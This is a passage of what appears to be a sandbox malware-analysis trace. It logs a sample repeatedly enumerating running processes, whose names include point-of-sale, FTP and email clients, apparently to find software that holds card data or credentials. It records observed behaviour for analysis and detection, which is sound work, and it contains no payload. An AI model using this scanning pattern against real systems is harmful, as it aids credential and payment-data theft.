cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0152.014] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0152.016] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0152.018] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0152.020] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0152.023] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0152.030] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0152.033] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0152.041] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1398, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0152.043] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0152.046] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0152.048] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0152.051] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x33c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x7c8, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0152.053] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0152.055] Process32Next (in: hSnapshot=0x1bf0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 0 [0152.057] CloseHandle (hObject=0x1bf0) returned 1 [0152.057] Sleep (dwMilliseconds=0x64) [0152.221] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1fcc [0152.238] Process32First (in: hSnapshot=0x1fcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0152.241] Process32Next (in: hSnapshot=0x1fcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7a, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0152.243] Process32Next (in: hSnapshot=0x1fcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0152.244] Process32Next (in: hSnapshot=0x1fcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0152.246] Process32Next (in: hSnapshot=0x1fcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0152.248] Process32Next (in: hSnapshot=0x1fcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0152.250] Process32Next (in: hSnapshot=0x1fcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0152.251] Process32Next (in: hSnapshot=0x1fcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0152.253] Process32Next (in: hSnapshot=0x1fcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0152.255] Process32Next (in: hSnapshot=0x1fcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0152.263] Process32Next (in: hSnapshot=0x1fcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0152.265] Process32Next (in: hSnapshot=0x1fcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0152.266] Process32Next (in: hSnapshot=0x1fcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0152.268] Process32Next (in: hSnapshot=0x1fcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0152.270] Process32Next (in: hSnapshot=0x1fcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0152.272] Process32Next (in: hSnapshot=0x1fcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0152.274] Process32Next (in: hSnapshot=0x1fcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0152.275] Process32Next (in: hSnapshot=0x1fcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0152.277] Process32Next (in: hSnapshot=0x1fcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0152.278] Process32Next (in: hSnapshot=0x1fcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0152.280] Process32Next (in: hSnapshot=0x1fcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0152.281] Process32Next (in: hSnapshot=0x1fcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x30, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0152.283] Process32Next (in: hSnapshot=0x1fcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0152.285] Process32Next (in: hSnapshot=0x1fcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0152.286] Process32Next (in: hSnapshot=0x1fcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0152.288] Process32Next (in: hSnapshot=0x1fcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0152.290] Process32Next (in: hSnapshot=0x1fcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0152.291] Process32Next (in: hSnapshot=0x1fcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0152.295] Process32Next (in: hSnapshot=0x1fcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0152.297] Process32Next (in: hSnapshot=0x1fcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0152.298] Process32Next (in: hSnapshot=0x1fcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0152.304] Process32Next (in: hSnapshot=0x1fcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0152.305] Process32Next (in: hSnapshot=0x1fcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0152.307] Process32Next (in: hSnapshot=0x1fcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0152.308] Process32Next (in: hSnapshot=0x1fcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0152.310] Process32Next (in: hSnapshot=0x1fcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0152.312] Process32Next (in: hSnapshot=0x1fcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0152.314] Process32Next (in: hSnapshot=0x1fcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0152.317] Process32Next (in: hSnapshot=0x1fcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0152.320] Process32Next (in: hSnapshot=0x1fcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0152.322] Process32Next (in: hSnapshot=0x1fcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0152.324] Process32Next (in: hSnapshot=0x1fcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0152.327] Process32Next (in: hSnapshot=0x1fcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0152.329] Process32Next (in: hSnapshot=0x1fcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0152.333] Process32Next (in: hSnapshot=0x1fcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0152.335] Process32Next (in: hSnapshot=0x1fcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0152.338] Process32Next (in: hSnapshot=0x1fcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0152.341] Process32Next (in: hSnapshot=0x1fcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0152.346] Process32Next (in: hSnapshot=0x1fcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0152.349] Process32Next (in: hSnapshot=0x1fcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0152.352] Process32Next (in: hSnapshot=0x1fcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0152.354] Process32Next (in: hSnapshot=0x1fcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0152.356] Process32Next (in: hSnapshot=0x1fcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0152.359] Process32Next (in: hSnapshot=0x1fcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0152.361] Process32Next (in: hSnapshot=0x1fcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0152.364] Process32Next (in: hSnapshot=0x1fcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0152.366] Process32Next (in: hSnapshot=0x1fcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0152.368] Process32Next (in: hSnapshot=0x1fcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0152.372] Process32Next (in: hSnapshot=0x1fcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0152.374] Process32Next (in: hSnapshot=0x1fcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0152.378] Process32Next (in: hSnapshot=0x1fcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0152.381] Process32Next (in: hSnapshot=0x1fcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0152.384] Process32Next (in: hSnapshot=0x1fcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0152.424] Process32Next (in: hSnapshot=0x1fcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0152.427] Process32Next (in: hSnapshot=0x1fcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0152.430] Process32Next (in: hSnapshot=0x1fcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0152.434] Process32Next (in: hSnapshot=0x1fcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0152.437] Process32Next (in: hSnapshot=0x1fcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0152.440] Process32Next (in: hSnapshot=0x1fcc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0152.442] Process32Next (in: 